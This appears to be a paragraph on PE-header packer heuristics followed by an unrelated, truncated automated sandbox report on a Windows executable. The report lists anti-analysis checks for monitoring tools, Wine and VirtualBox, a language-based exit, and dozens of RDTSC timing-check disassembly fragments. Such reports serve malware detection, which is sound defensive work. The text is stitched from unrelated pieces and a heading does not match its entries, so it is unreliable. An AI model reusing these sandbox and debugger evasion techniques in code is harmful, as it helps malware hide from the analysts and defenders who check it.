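On a real file the section table, entry point RVA and stored CheckSum come from the PE headers (pefile exposes them as `sections`, `OPTIONAL_HEADER.AddressOfEntryPoint` and `OPTIONAL_HEADER.CheckSum`), and `pe_checksum` is run over the whole file with the offset of the CheckSum field. None of these rules is proof of malice on its own: a wrong checksum is common in unsigned builds, and resources with embedded images push entropy up too. It is the combination seen here, high-entropy non-standard sections plus an entry point outside the code section, that marks a packer stub.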

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (searched twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (searched twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 59FDA7, second address 59FDAD, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 59FDAD, second address 59FDB1, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A0000, second address 5A0034, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FBE44C971B6h 0x0000000c popad 0x0000000d push edi 0x0000000e jmp 00007FBE44C971C6h 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007FBE44C971BCh 0x0000001d jc 00007FBE44C971B6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A0187, second address 5A019B, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44689660h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A019B, second address 5A019F, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A019F, second address 5A01A5, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A01A5, second address 5A01AA, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A2EF8, second address 5A2EFD, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A2EFD, second address 5A2F02, instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A2F56, second address 5A2F60, instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE4468965Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A2F60, second address 5A2FAA, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FBE44C971B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub cl, FFFFFFD8h 0x00000024 push 00000000h 0x00000026 mov ecx, 419AA9CAh 0x0000002b and ecx, dword ptr [ebp+122D2DCCh] 0x00000031 push 5EF72820h 0x00000036 push eax 0x00000037 push edx 0x00000038 je 00007FBE44C971B8h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A2FAA, second address 5A3035, instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE4468965Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 5EF728A0h 0x00000011 mov dword ptr [ebp+124525C6h], ebx 0x00000017 push 00000003h 0x00000019 add dword ptr [ebp+122D5C20h], edx 0x0000001f jmp 00007FBE4468965Ah 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FBE44689658h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 push 00000003h 0x00000042 movzx edi, cx 0x00000045 push C51C2B11h 0x0000004a push esi 0x0000004b push esi 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e pop esi 0x0000004f pop esi 0x00000050 xor dword ptr [esp], 051C2B11h 0x00000057 mov esi, dword ptr [ebp+122D2F0Ch] 0x0000005d lea ebx, dword ptr [ebp+12454E40h] 0x00000063 cld 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 pushad 0x00000067 jmp 00007FBE44689660h 0x0000006c push ecx 0x0000006d pop ecx 0x0000006e popad 0x0000006f push eax 0x00000070 push edx 0x00000071 push edi 0x00000072 pop edi 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A3035, second address 5A3058, instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE44C971C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A3147, second address 5A316C, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44689667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A316C, second address 5A31B7, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FBE44C971B8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 jmp 00007FBE44C971BEh 0x00000016 jnc 00007FBE44C971BCh 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FBE44C971C8h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 5A31B7, second address 5A3236, instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBE44689656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBE44689668h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 pop eax 0x00000015 mov cx, si 0x00000018 push 00000003h 0x0000001a mov dword ptr [ebp+122D27B9h], eax 0x00000020 sub ecx, dword ptr [ebp+122D2D3Ch] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FBE44689658h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 pushad 0x00000043 mov eax, dword ptr [ebp+122D2E10h] 0x00000049 popad 0x0000004a add dword ptr [ebp+122D17F8h], edi 0x00000050 push 00000003h 0x00000052 mov dword ptr [ebp+122D32B3h], esi 0x00000058 push 59E362B0h 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FBE4468965Bh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3236 second address: 5A329F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE44C971B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 661C9D50h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FBE44C971B8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d add dword ptr [ebp+122D5C28h], eax 0x00000033 mov dx, 9F98h 0x00000037 lea ebx, dword ptr [ebp+12454E49h] 0x0000003d jmp 00007FBE44C971BFh 0x00000042 push edi 0x00000043 or dword ptr [ebp+122D2AA9h], esi 0x00000049 pop edi 0x0000004a xchg eax, ebx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jno 00007FBE44C971B6h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3379 second address: 5A33C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44689669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1FEDED2Fh 0x00000010 mov dword ptr [ebp+122D31F2h], edx 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D28B2h], esi 0x0000001e push 00000000h 0x00000020 mov cx, bx 0x00000023 push 00000003h 0x00000025 mov ch, ah 0x00000027 push 4BCFA41Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jnp 00007FBE44689656h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5751 second address: 5B5755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5917EA second address: 5917F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5917F0 second address: 591812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FBE44C971CDh 0x0000000b jmp 00007FBE44C971C7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591812 second address: 591849 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE44CEB6EBh 0x00000008 jmp 00007FBE44CEB6E5h 0x0000000d jmp 00007FBE44CEB6DBh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jp 00007FBE44CEB6EFh 0x0000001a push edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2440 second address: 5C2448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2448 second address: 5C244D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C244D second address: 5C246D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBE44D6BDB4h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C246D second address: 5C2471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C25B6 second address: 5C25C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBE44D6BDA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2713 second address: 5C2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2717 second address: 5C276C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D6BDB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBE44D6BDB4h 0x0000000e jg 00007FBE44D6BDACh 0x00000014 push edx 0x00000015 jmp 00007FBE44D6BDADh 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBE44D6BDADh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C276C second address: 5C2774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2774 second address: 5C2778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2778 second address: 5C277C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C28DF second address: 5C28E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2B86 second address: 5C2B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FBE44CEB6D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2B94 second address: 5C2BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE44D6BDB1h 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FBE44D6BDA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2BB2 second address: 5C2BCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44CEB6DBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jno 00007FBE44CEB6D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2BCD second address: 5C2BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FBE44D6BDACh 0x0000000e jns 00007FBE44D6BDA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2EA3 second address: 5C2EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32DB second address: 5C32EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32EB second address: 5C32EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32EF second address: 5C32F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32F7 second address: 5C3301 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE44CEB6DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D0D second address: 5B6D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D15 second address: 5B6D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D19 second address: 5B6D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D1F second address: 5B6D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FBE44CEB6D6h 0x0000000d jmp 00007FBE44CEB6E3h 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3FAD second address: 5C3FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FBE44D6BDA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C92A0 second address: 5C92B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push esi 0x00000008 jne 00007FBE44CEB6D6h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jno 00007FBE44CEB6D6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C92B9 second address: 5C92BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 598412 second address: 598416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB64B second address: 5CB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D6BDAAh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB660 second address: 5CB664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB664 second address: 5CB679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D6BDADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB679 second address: 5CB699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FBE44CEB6DBh 0x00000013 je 00007FBE44CEB6D6h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB8D9 second address: 5CB8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBE44D6BDA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1251 second address: 5D129D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FBE44CEB6E0h 0x0000000a je 00007FBE44CEB6E6h 0x00000010 jmp 00007FBE44CEB6E0h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FBE44CEB6E1h 0x0000001d jmp 00007FBE44CEB6DBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0B21 second address: 5D0B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0DD2 second address: 5D0DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0F97 second address: 5D0F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0F9B second address: 5D0FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE44CEB6DAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0FAD second address: 5D0FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3379 second address: 5D337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D337F second address: 5D3384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3473 second address: 5D3488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44CEB6E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3589 second address: 5D3592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D366D second address: 5D3673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D376C second address: 5D3772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3772 second address: 5D3776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3CB4 second address: 5D3CBE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D6BDACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3E63 second address: 5D3E69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3E69 second address: 5D3E90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBE44D6BDB6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FBE44D6BDA8h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D41C6 second address: 5D41CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D429B second address: 5D42F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44D6BDB3h 0x00000008 jmp 00007FBE44D6BDADh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FBE44D6BDA8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, ebx 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FBE44D6BDB2h 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D42F0 second address: 5D42F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D42F4 second address: 5D42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D42FD second address: 5D4303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D52AE second address: 5D5339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBE44D6BDA6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBE44D6BDA8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FBE44D6BDB0h 0x00000030 push 00000000h 0x00000032 sub esi, 5A4F6701h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FBE44D6BDA8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 pushad 0x00000057 push ebx 0x00000058 pop ebx 